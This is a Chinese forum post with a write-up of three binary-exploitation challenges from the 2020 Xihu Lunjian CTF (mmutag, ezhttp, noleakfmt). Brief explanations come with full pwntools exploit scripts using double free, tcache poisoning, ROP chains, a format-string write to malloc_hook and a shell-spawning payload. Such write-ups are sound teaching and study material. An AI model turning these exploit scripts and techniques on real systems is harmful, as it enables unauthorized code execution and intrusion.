首页
论坛
课程
招聘
2020西湖论剑题目write up
2020-10-10 09:44 1907

2020西湖论剑题目write up

2020-10-10 09:44
1907

2020 西湖论剑题目 write up

mmutag

Double free分配chunk到stack中,然后改写ret地址,得到libc地址,进而覆盖ret地址为one_gadget

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':       
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    ctx.binary = './pwn'
    #ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64'
    ctx.remote = ('183.129.189.62', 60804)
    #ctx.remote_libc = './libc.so'
    #ctx.debug_remote_libc = True
 
    ctx.symbols = {
        'node':0x6020C0,
    }
 
    ctx.breakpoints = [0x400AB5]#menu
 
    def lg(s,addr):
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    def add(idx,content='\n'):
        sla('ise',1)
        sla('id',idx)
        sa('content',content)
 
    def delete(idx):
        sla('ise',2)
        sla('id',idx)
 
    def read_some(content):
        sla('ise',3)
        s(content)
 
 
 
 
 
    rs('remote')
    #dbg()
    name = '123'
    sla('name',name)
    ru('tag: ')
    stack = int(ru(':',drop=True),16)
    aim = stack-0x40
    lg('stack',stack)
 
    #rs('remote')
    sla('ice',2)
 
    add(1)
    add(2)
    add(3)
 
    delete(1)
    delete(2)
    delete(1)
 
    read_some('a'*0x19)
    ru('a'*0x19)
    canary = uu64('\0' + r(7))
    lg('canary',canary)
 
    read_some(p64(0x7f)*2+p64(stack-0x23)+'\0')
    dbg()
    add(4,p64(aim))
    add(5)
 
    pop_rdi = 0x0000000000400d23
    puts_plt = 0x4006B0
    puts_got = 0x602020
    #payload = '\0'*3 + p64(stack-0x20) + p64(0x0000000000400750) + p64(0x0000000000400b01)
    payload = 'a'*0x8 + p64(canary)
    payload += p64(stack+0x10) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x400A99)
    add(6)
    add(7,payload)
 
    sla('ise',4)
    ru('\n')
    libc_base = uu64(ru('\n',drop=True))-0x6f6a0#-ctx.libc.sym['puts']
    lg('libc_base',libc_base)
    one = libc_base+ 0x45226
 
    payload = '\0'*3 + p64(0)*1+p64(canary)+p64(0) + p64(one)
    add(8,payload)
 
 
    irt()

ezhttp

2.27 先用tache atk改写控制结构,使得tcache bin数目超过7,然后利用unsortbin中残留的信息,爆破stdout,进而泄露libc/stack/prog地址,然后控制global_node结构,改写stack,最终进行rop,orw读取flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':       
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    ctx.binary = './ezhttp.bak'
    #ctx.custom_lib_dir = '/home/rhl/Desktop/CTF/glibc-all-in-one/libs/2.23-0ubuntu10_amd64' #change the libs
    ctx.remote_libc = './libc-2.27.so'  #only change the libc.so 
    ctx.remote = ('183.129.189.61',56002)
    ctx.debug_remote_libc = True
 
    ctx.symbols = {
        'node':0x203120
    }
 
    ctx.breakpoints = [0x18CD,0x1753]#menu:0x18CD  ,0x1A78,0x12CC
    ctx.debug()
    def lg(s,addr):
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
    def add(idx, content):
        payload = 'POST /create '
        payload += 'Cookie: user=admin '
        payload += 'token: '+'\x01\x0d'
        payload += '\r\n\r\n'
        payload += 'content=' + content
        sa('me',payload)
 
    def delete(idx):
        payload = 'POST /del '
        payload += 'Cookie: user=admin '
        payload += 'token: '+'\x01\x0d'
        payload += '\r\n\r\n'
        payload += 'index=' + str(idx)
        sa('me',payload)
    def edit(idx,content):
        payload = 'POST /edit '
        payload += 'Cookie: user=admin '
        payload += 'token: '+'1\r'
        payload += '\r\n\r\n'
        payload += 'index=' + str(idx) + "&" + 'content=' + content
        sa('me',payload)
 
    while True:
        try:
            rs()
            context.log_level = 'info'
            #rs('remote')
            #rs()
 
            add(0,'a'*0x10)
            ru('Your gift: ')
            heap_base = int(ru('\"',drop=True),16)-0x260
            lg('heap_base',heap_base)
 
            delete(0)
            delete(0)
            payload =  '\x05'*0x8+'\xff'*6+'\x05'*2
            add(1,p64(heap_base+0x10))
            add(2,'a'*0x8)
            add(3,payload)
            #dbg()
            add(4,'a'*0xa0)
            add(5,'a'*0xf0)
            delete(4)
            add(6,'\x60\xb7')
            #dbg()
            delete(1)
            edit(2,p64(heap_base+0x280)[:6]+'\n')
            #dbg()
            add(7,'a'*0x6)
            add(8,'\x80\xb7')
            add(9,p64(0xfbad3887))
            #edit(6,'\x80\n')
            delete(7)
            edit(2,p64(heap_base+0x280)[:6]+'\n')
            #dbg()
            add(10,'a'*6)
            add(11,'\x80\xb7')
            #dbg()
            #add(11,'./flag')
            #add(12,'\x80')
            add(12,'a'*0x10)
            edit(12,'\x80\n')
            #'''
            ru('========\n')
            libc_base = uu64(r(8)) - 0x3ec780
            lg('libc',libc_base)
            aim = libc_base+0x619f60
            environ = libc_base+0x3ee098
            lg('environ',environ)
            payload = p64(environ) + p64(environ+8)[:6] + '\n'
            edit(12,payload)
            ru('========\n')
            stack = uu64(r(8))
            aim = stack-0x1940
            lg('stack',stack)
            payload = p64(aim) + p64(aim+8)[:6] + '\n'
            edit(12,payload)
            ru('========\n')
            prog = uu64(r(8))-0x1afc
            lg('prog',prog)
            #dbg()
 
            node = prog+0x203120
            #edit(12)
            delete(5)
            delete(5)
            add(13,'a'*0xf0)
            edit(13,p64(node)+p64(0)+'\n')
            add(14,'a'*0xf0)
            edit(2,'./flag\0\n')
            #dbg()
            payload = p64(aim) + p64(0xf0)+p64(heap_base+0x260)+p64(0x10)+'\n'
            add(15,'a'*0xf0)
            edit(15,payload)
            pop_rdi = libc_base + 0x000000000002155f
            pop_rsi = libc_base + 0x0000000000023e8a
            pop_rdx = libc_base + 0x0000000000001b96
            open1 = libc_base+0x10fd50
            read = libc_base+0x110180
            write = libc_base + 0x110250
            flag_addr = heap_base +0x260
            heap_addr = heap_base + 0x1000
            payload = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(open1)
            payload += p64(pop_rdi) + p64(4 ) + p64(pop_rsi) + p64(heap_addr) + p64(pop_rdx) + p64(0x30) + p64(read)
            payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(heap_addr) + p64(pop_rdx) + p64(0x30) + p64(write)
            payload += p64(0)+'\n'
            #dbg()
            edit(0,payload)
            irt()
        except KeyboardInterrupt:
            break
        except EOFError:
            continue

noleakfmt

提供了stack地址,但是关闭了stdout输出,这种情况下利用fmt漏洞最多写0x2000字节左右。

 

起初打算利用stack区域中原有的跳板来做,如下图所示,但是经过测试得到跳板的栈区偏移是非固定的,所以跳板的偏移也不能确定,当时没有注意到跳板偏移不固定,时间也不够了就没有把这题做出来。

 

所以需要人为构造跳板,由于关闭了标准输出以后fmt只能写0x2000左右大小,当rsp后两字节小于0x1ff8的时候,可以将跳板的末尾两字节覆盖为rsp+8,解决了跳板的问题。

 

后面的思路就是利用stack区域中残留的libc信息,修改_IO_2_1stdout->_fileno为二,然后修改malloc_hook为one_gadget,最终printf输出长字符串调用malloc 进行get shell。

 

最终是需要爆破两个地方,概率大概是1/256

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':       
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop,timeout=0.3)#
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    ctx.binary = './pwn'
    #ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64'
    ctx.remote = ('183.129.189.61', 53905)
    #ctx.remote_libc = './libc.so'
    #ctx.debug_remote_libc = True
 
    ctx.symbols = {
        'node':0x2022a0,
    }
 
    ctx.breakpoints = [0x985]#menu
 
    def lg(s,addr):
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    while True:
        try:
            context.log_level = 'info'
            rs()
            #rs('remote')
            def calc(value,offset,fmt='hhn'):
                sl('%'+str(value)+'c%'+str(offset)+'$'+fmt+'\x00')
            #dbg()
            ru('gift : ')
            stack = int(r(14),16)
            if (stack-4)&0xffff > 0x1ff8 :
                continue
            num = (stack -4+8) & 0xffff  # 7
            lg('stack',stack)
            aim = stack + 0x31c - 0x30 -800 + 856
            lg('aim',aim)
            #calc(0x2000,11,'hn')
            tmp0 = aim&0xff
            tmp1 = (aim&0xff00) >> 8
            tmp2 = (aim&0xff0000) >> 8*2
            tmp3 = (aim&0xff000000) >> 8*3
            tmp4 = (aim&0xff00000000) >> 8*4
            tmp5 = (aim&0xff0000000000) >> 8*5
            tmp6 = (aim&0xff000000000000) >> 8*6
            tmp7 = (aim&0xff00000000000000) >> 8*7
            dbg()
            calc(num,11,'hn')
            calc(tmp0,37)
            calc(num+1,11,'hn')
            calc(tmp1,37)
            calc(num+2,11,'hn')
            calc(tmp2,37)
            calc(num+3,11,'hn')
            calc(tmp3,37)
            calc(num+4,11,'hn')
            calc(tmp4,37)
            calc(num+5,11,'hn')
            calc(tmp5,37,'n')
            #dbg()
            calc(num,11,'hn')
            calc(0x90,7)
            calc(tmp0+1,37)
            calc(0x26,7)
 
            calc(tmp0,37)
            calc(2,107)
            #dbg()
            #sleep(2)
            sl('%p   %9$p')
            ru('0x')
            a = ru('0x')
            if len(a) == 0:
                continue
            libc = int(r(12),16)
            lg('libc',libc)
            malloc_hook = libc+0x3a42d0
            one = libc-0x20840+0xf1207
 
            aim = malloc_hook
            tmp0 = aim&0xff
            tmp1 = (aim&0xff00) >> 8
            tmp2 = (aim&0xff0000) >> 8*2
            tmp3 = (aim&0xff000000) >> 8*3
            tmp4 = (aim&0xff00000000) >> 8*4
            tmp5 = (aim&0xff0000000000) >> 8*5
            tmp6 = (aim&0xff000000000000) >> 8*6
            tmp7 = (aim&0xff00000000000000) >> 8*7
            calc(num,11,'hn')
            calc(tmp0,37)
            calc(num+1,11,'hn')
            calc(tmp1,37)
            calc(num+2,11,'hn')
            calc(tmp2,37)
            calc(num+3,11,'hn')
            calc(tmp3,37)
            calc(num+4,11,'hn')
            calc(tmp4,37)
            calc(num+5,11,'hn')
            calc(tmp5,37,'n')
 
            calc(num,11,'hn')
            #dbg()
            calc(one&0xffff,7,'hn')
            calc(tmp0+2,37)
            calc((one&0xffff0000)>>16,7,'hn')
            calc(tmp0+4,37)
            calc((one&0xffff00000000)>>32,7,'hn')
            #dbg()
            sl('sh;%1000000c$hn;')
            sl('cat flag >& 2')
            irt()
 
        except KeyboardInterrupt:
            break
        except EOFError:
            continue

[培训]12月3日2020京麒网络安全大会《物联网安全攻防实战》训练营,正在火热报名中!地点:北京 · 新云南皇冠假日酒店

最后于 2020-10-16 16:53 被iddm编辑 ,原因:
上传的附件:
收藏
点赞1
打赏
分享
最新回复 (3)
雪    币: 36
活跃值: 活跃值 (1010)
能力值: ( LV5,RANK:75 )
在线值:
发帖
回帖
粉丝
Vinadiak 活跃值 1 2020-10-11 10:12
2
0

师傅tql

最后于 2020-10-12 08:38 被Vinadiak编辑 ,原因:
雪    币: 51
活跃值: 活跃值 (56)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
hwfyff 活跃值 2020-10-12 14:40
3
0

师傅能不能发一份题

最后于 2020-10-12 14:40 被hwfyff编辑 ,原因:
雪    币: 2051
活跃值: 活跃值 (965)
能力值: ( LV9,RANK:240 )
在线值:
发帖
回帖
粉丝
iddm 活跃值 4 2020-10-16 16:54
4
0
hwfyff 师傅能不能发一份题
好了
游客
登录 | 注册 方可回帖
返回